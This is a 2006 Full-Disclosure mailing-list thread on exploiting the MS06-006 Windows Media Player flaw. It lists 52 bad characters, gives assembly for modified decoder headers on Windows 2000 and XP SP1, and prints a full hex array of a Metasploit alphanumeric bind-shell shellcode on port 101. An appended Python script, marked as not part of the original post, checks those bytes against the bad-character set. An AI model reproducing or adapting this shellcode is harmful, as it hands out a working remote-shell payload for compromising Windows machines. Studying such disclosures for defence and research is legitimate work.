Message-ID: <43F502BA.6040400@heapoverflow.com>
Date: Thu Feb 16 22:54:56 2006
From: ad at heapoverflow.com (ad@...poverflow.com)
Subject: MS06-06 Windows Media Player Exploitation
If you try the shellcode, this won't work of course, because it's made in
another exploitation environment; but at least if you are in the same
case you can try to do it via this method, depending on your current
registers and modding the shellcode header to fit your vulnerability
environment, where the Metasploit project can't mod this "locked" header.
Hope it helps.
ad@...poverflow.com wrote:
> Not sure about what you are looking for, but read this below; it's
> from an unpublished PoC where I had to trick with 52 badchars:
>
> --------------------------------------------------------------------------------------------
> 52 BADCHARS:
>
> 0x00 0x22 0x61 0x62 0x63 0x64 0x65 0x66 0x67 0x68 0x69 0x70 0x71
> 0x72 0x73 0x74 0x75 0x76 0x77 0x78 0x79 0xE0 0xE1 0xE2 0xE3 0xE4
> 0xE5 0xE6 0xE7 0xE8 0xE9 0xEA 0xEB 0xEC 0xED 0xEE 0xEF 0xF0 0xF1
> 0xF2 0xF3 0xF4 0xF5 0xF6 0xF8 0xF9 0xFA 0xFB 0xFC 0xFD 0xFE 0xFF
>
>
> Due to the high number of bad chars, especially an upper/lower case
> conflict, I have used the msf bind shellcode port 101 with the
> PexAlphaNum encoder.
>
>   EB 03          JMP SHORT 0012EE63
>   59             POP ECX
>   EB 05          JMP SHORT 0012EE68
>   E8 F8FFFFFF    CALL 0012EE60
>
> But it contains 7 bad chars as you can see, so another way is (for
> 2k):
>
>
>   83C3 1C        ADD EBX,1C
>   53             PUSH EBX
>   59             POP ECX
>
> Because EBX+1C is a fixed address pointing to where the alphanum
> shellcode starts, and so on, it is popped into ECX correctly, with
> 0 badchars.
>
> And the one for XP SP1 (because there is no longer a direct pointer
> where I need it, but I found one near the dword of a register):
>
>   834424 08 1C   ADD DWORD PTR SS:[ESP+8],1C
>   895C24 08      MOV EBX,DWORD PTR SS:[ESP+8]
>   53             PUSH EBX
>   59             POP ECX
>
> ------------------------------------------------------------------------------------------------
>
>
> /* modded metasploit bindshellcode port 101 */
> char scode1[]=
> "\x90\x90\x90\x90\x90\x83\xC3\x1C\x53\x59" /* above this text is the
>    modded header for 2k; it changes depending on the OS you exploit,
>    read my exploit's header or debug for more information. This is
>    how I trick with 52 badchars... thanks to the msf guys for all the
>    rest, this is a great alphanum uppercase shellcode, really
>    appreciated here :) */
> "\x4f\x49\x49\x49\x49\x49"
> "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
> "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
> "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
> "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
> "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58"
> "\x4e\x36\x46\x42\x46\x32\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37"
> "\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x48"
> "\x4f\x45\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x48"
> "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
> "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
> "\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x42\x45\x47\x45\x4e\x4b\x48"
> "\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x50\x4b\x54"
> "\x4b\x38\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x38"
> "\x49\x58\x4e\x56\x46\x32\x4e\x41\x41\x46\x43\x4c\x41\x53\x4b\x4d"
> "\x46\x36\x4b\x48\x43\x44\x42\x43\x4b\x48\x42\x44\x4e\x30\x4b\x38"
> "\x42\x47\x4e\x31\x4d\x4a\x4b\x58\x42\x44\x4a\x50\x50\x55\x4a\x36"
> "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x56"
> "\x43\x55\x48\x56\x4a\x56\x43\x33\x44\x53\x4a\x56\x47\x37\x43\x57"
> "\x44\x53\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
> "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x48\x45\x4e"
> "\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x56\x44\x50"
> "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35"
> "\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x55\x43\x35\x43\x55\x43\x34"
> "\x43\x35\x43\x34\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x42\x30"
> "\x45\x56\x48\x36\x43\x35\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a"
> "\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x51"
> "\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
> "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d"
> "\x4a\x56\x45\x4e\x49\x54\x48\x48\x49\x44\x47\x35\x4f\x4f\x48\x4d"
> "\x42\x45\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
> "\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45"
> "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x36\x48\x46\x4a\x36\x43\x56"
> "\x4d\x46\x49\x38\x45\x4e\x4c\x36\x42\x45\x49\x45\x49\x52\x4e\x4c"
> "\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x48\x44\x4e\x41\x53\x42\x4c"
> "\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x44\x44\x4e\x52"
> "\x43\x49\x4d\x48\x4c\x37\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
> "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x54\x4f\x4f"
> "\x48\x4d\x4b\x45\x47\x35\x44\x45\x41\x55\x41\x35\x41\x35\x4c\x46"
> "\x41\x30\x41\x55\x41\x55\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x36"
> "\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36"
> "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f"
> "\x43\x38\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
> "\x4a\x36\x50\x57\x4a\x4d\x44\x4e\x43\x37\x43\x45\x4f\x4f\x48\x4d"
> "\x4f\x4f\x42\x4d\x5a";
>
>
> c0ntex wrote:
>> No exploit, just some basic research - anyone with 100% ASCII win32
>> shellcode?
>> http://open-security.org/winmedia/index.html
>>
>> --
>>
>> regards c0ntex
>> _______________________________________________
>> Full-Disclosure - We believe in it. Charter:
>> http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
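As an added example (not part of the original post), the following Python reproduces the badchar check behind the quoted listings: it builds the 52-byte set from the list quoted in the thread, counts collisions for the stock PexAlphaNum prologue and the two replacement headers, and parses the first literal lines of scode1 to confirm the uppercase-alphanum body stays inside the allowed range. The opcode bytes and the scode1 prefix are taken from the post itself; everything else (names, helper functions) is assumed here.

```python
import re

# Constructed from the 52-badchar list quoted in the thread.
BADCHARS = frozenset(
    [0x00, 0x22]
    + list(range(0x61, 0x6A))   # 0x61..0x69  ('a'..'i')
    + list(range(0x70, 0x7A))   # 0x70..0x79  ('p'..'y')
    + list(range(0xE0, 0xF7))   # 0xE0..0xF6  (0xF7 is not in the list)
    + list(range(0xF8, 0x100))  # 0xF8..0xFF
)
assert len(BADCHARS) == 52

# The three header candidates from the post's disassembly listings.
HEADERS = {
    # stock PexAlphaNum prologue: JMP SHORT / POP ECX / JMP SHORT / CALL
    "msf jmp-call-pop": bytes.fromhex("EB03" "59" "EB05" "E8F8FFFFFF"),
    # Win2k replacement: ADD EBX,1C / PUSH EBX / POP ECX
    "2k add-push-pop": bytes.fromhex("83C31C" "53" "59"),
    # XP SP1 replacement: ADD [ESP+8],1C / MOV EBX,[ESP+8] / PUSH EBX / POP ECX
    "xpsp1 esp-relative": bytes.fromhex("834424081C" "895C2408" "53" "59"),
}

def parse_c_hex_literal(src: str) -> bytes:
    """Turn adjacent C string literals of \\xNN escapes (comments allowed) into bytes."""
    src = re.sub(r"/\*.*?\*/", "", src, flags=re.S)
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9A-Fa-f]{2})", src))

def find_badchars(code: bytes, badchars=BADCHARS) -> list:
    """Return (offset, byte) pairs in `code` that collide with the badchar set."""
    return [(i, b) for i, b in enumerate(code) if b in badchars]

def check_headers(headers=HEADERS) -> dict:
    """Map header name -> number of colliding bytes (0 means it passes the filter)."""
    return {name: len(find_badchars(code)) for name, code in headers.items()}

# First literal lines of scode1 from the post: the modded 2k header
# followed by the start of the uppercase-alphanum encoded body.
SCODE1_PREFIX = r'''
"\x90\x90\x90\x90\x90\x83\xC3\x1C\x53\x59" /* modded header for 2k */
"\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
'''

if __name__ == "__main__":
    for name, n in check_headers().items():
        print(f"{name:20s} bad bytes: {n}")
    print("scode1 prefix bad bytes:", find_badchars(parse_c_hex_literal(SCODE1_PREFIX)))
```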